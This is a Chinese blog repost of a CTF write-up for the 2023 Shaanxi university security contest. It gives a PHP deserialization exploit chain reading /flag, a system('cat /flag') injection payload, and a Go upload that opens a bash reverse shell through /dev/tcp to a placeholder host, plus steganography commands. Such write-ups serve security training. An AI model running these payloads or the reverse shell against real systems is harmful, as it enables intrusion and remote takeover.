2023陕西省大学生信息安全竞赛web writeup

这篇具有很好参考价值的文章主要介绍了2023陕西省大学生信息安全竞赛web writeup。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言

早写好了,忘发了,题目质量还行,够我坐大牢

ezpop

简单的反序列化,exp如下

<?php
class night
{
    public $night;
}

class day
{
    public $day;

}
class light
{
    public $light;
}class dark
{
    public $dark;
}
$n = new night;
$d1 = new day;
$d2 = new day;
$l = new light;
$d = new dark;
$d3 = new dark;
$n->night = $d1;
$d1->day = $d;
$d->dark = $l;
$l->light = $d2;
$d2->day = $d3;
$d3->dark = 'php://filter/read=convert.base64-encode/resource=/flag';
echo serialize($n);
?>

传参这有个坑,用了Unicode编码,得copy下来进行url编码才能传参,不知道这么干有什么意义,还得绕过Exception,把变量数改一下就能绕过了,跟绕wakeup一样

ezrce

preg_replace采用了/e的模式,很明显有rce漏洞,简单的测试了一下,不能用数字等等,这waf有点牛逼,采用无参rce直接读flag就行了,name得含有hahaha

unserialize

非预期,?a=system ('cat /flag');就能读flag

test

查看页面源代码,发现/profile/index这个路由,访问一下返回一个result,啥也没有,仿问/profile/admin,返回了密码,MD5解密一下asdfgh123admin登录进去,提示上传个go文件,就会运行,构造一个上传数据包,go文件如下:

package main

import (
  "fmt"
  "log"
  "os/exec"
)

func main() {
  cmd := exec.Command("/bin/bash", "-c", "bash -i &> /dev/tcp/ip/port 0>&1")
  out, err := cmd.CombinedOutput()
  if err != nil {
    fmt.Printf("combined out:\n%s\n", string(out))
    log.Fatalf("cmd.Run() failed with %s\n", err)
  }
  fmt.Printf("combined out:\n%s\n", string(out))
}

反弹shell,拿到flag

Misc

管道

zsteg -a 管道.png | grep "flag"

可是雪啊飘进双眼

第一步hint.wav,藏了摩斯密码,解密出来是WOAISHANXI ,snow.txt,snow解密,snow.exe -p WOAISHANXI -C snow.txt ,拿到密码shanxiroujiamo,解开压缩包,两张图片,key.jpg与hide.jpg, binwalk -e key.jpg 提取出一个压缩包,里面有张图片,跟key.jpg的密文相对应,一一对照拿到密码BC1PVEYD, steghide解hide.jpg即可拿到flag文章来源地址https://www.toymoban.com/news/detail-471792.html

到了这里,关于2023陕西省大学生信息安全竞赛web writeup的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 2023浙江省大学生信息安全竞赛技能赛初赛 部分wp

    1、题目信息 查看代码 2、解题方法 这种一看就是计算结果然后结果ASCII组成flag,可以试一下第一个,结果68,对应ASCII正好是D,因此想法正确 exp: 1、附件信息 2、解题方法 根据代码部分可知也就是求:p 2 + q 2 =n 利用sage里方法two_squares来求解。 参考:https://wstein.org/edu/2007/s

    2024年02月05日
    浏览(51)
  • 大学生简历信息填写模板

        大学生简历信息填写模板篇1   姓名:__性别:_年龄:22健康状况:良好   籍贯:__家庭背景:职工家庭   所学专业:市场营销学历:本科(在读)   参业意向:可从事文秘工作、贸易、产品营销、活动策划、谈判沟通、广告宣传,市场调查等方面工作。   知识结构:

    2024年02月09日
    浏览(53)
  • 2023大学生申请github学生认证经验分享

      如图,笔者最近刚刚申请完github的学生认证,于是想着来分享经验让大家能轻松通过认证。 你需要有以下材料: 教育邮箱(大学一般都会有教育邮箱,学校官网找找邮箱页面,申请个邮箱) 学信网教育部学籍在线验证报告 都有的话你就只需要跟着下面的步骤。 首先你得

    2024年02月09日
    浏览(60)
  • 2023陕西师范大学计算机考研信息汇总

    陕西师范大学计算机科学学院 http://ccs.snnu.edu.cn/ 陕西师范大学教育学院 http://edu.snnu.edu.cn/       陕西师范大学是教育部直属师范大学、国家“ 211 工程”重点建设学校,具有60多年的建校历史,是国家培养高等院校、中等学校师资和教育管理干部的重要基地,被誉为西北地区

    2024年02月05日
    浏览(55)
  • 基于java大学生兼职信息管理系统

    目前的兼职中介不仅损害了大学生的经济利益,让他们对网上兼职避而远之,与此同时,很多客户比如家里有小孩子的家长都想找一个安全、可靠的家教帮助孩子提高成绩,通过中介找到的既不安全可靠,价格也相对昂贵。因此,为大学生与客户之间搭建一个能直接联系的沟

    2023年04月08日
    浏览(49)
  • 2023美国大学生数学建模竞赛资料及思路

    (赛题出来以后第一时间分享) 报名截止日期:美国东部时间2023 年2月16日星期四下午 3:00前。(北京时间2023年2月17日凌晨4点) 比赛开始:美国东部时间 2023 年 2 月 16 日星期四下午 5:00。(北京时间2023年2月17日早上6点) 比赛结束:美国东部时间 2023 年 2 月 20 日星期一晚上

    2024年02月16日
    浏览(52)
  • 2023“钉耙编程”中国大学生算法设计超级联赛(1)

    给出一颗树,两人在树上特定两点来回走,问最早在那个节点相遇。 两条路径相交,则一条路径的LCA一定在另一条路径上。我们可以预处理一个dfs时间戳,结合LCA来判断路径相交。 由于本题的点数较小,所以我们可以枚举相交链上的每一个点,然后计算他们在这个点最早相遇

    2024年02月16日
    浏览(49)
  • 2023“钉耙编程”中国大学生算法设计超级联赛(2)

    起初有n个物品,玩家可以有如下操作: ①若该堆物品数量小于等于k,全部拿走。 ②若该堆物品数量大于k,则只能选择拿走k个物品,并将剩余物品分成不为空的两堆。 Alice先手,问谁必胜。 打表可知当n % (4 * k + 2) == k + 1时Alice必败,其他时候必胜。 打表代码: 给定一个0

    2024年02月15日
    浏览(45)
  • 2023“钉耙编程”中国大学生算法设计超级联赛(3)

    有n个数 (x_1,x_2,...,x_n) ,在其中选k个数依次放入栈中。如果当前放入栈中的数 (x_i) 小于栈顶的数,则向栈中放入与先前的栈顶相同的数而不是 (x_i) 。求对于每个k对应的方案数。 先排序离散化,然后考虑dp。 状态定义: f[i][j]表示长度为i且最后一个数是j的方案数。 状态转

    2024年02月10日
    浏览(43)
  • 2023“钉耙编程”中国大学生算法设计超级联赛(5)

    给你台风的轨迹坐标以及避难所的坐标,台风的半径不可预测,求让每个避难所不安全的最小台风半径是多少。 枚举每个点到所有“线段”的距离取个min。 附上队友的代码(懒): 给定一个长度为n的字符串,编号1-n,求满足条件的区间(i, j)的数量: ①1 ≤ i < j ≤ n ②

    2024年02月09日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包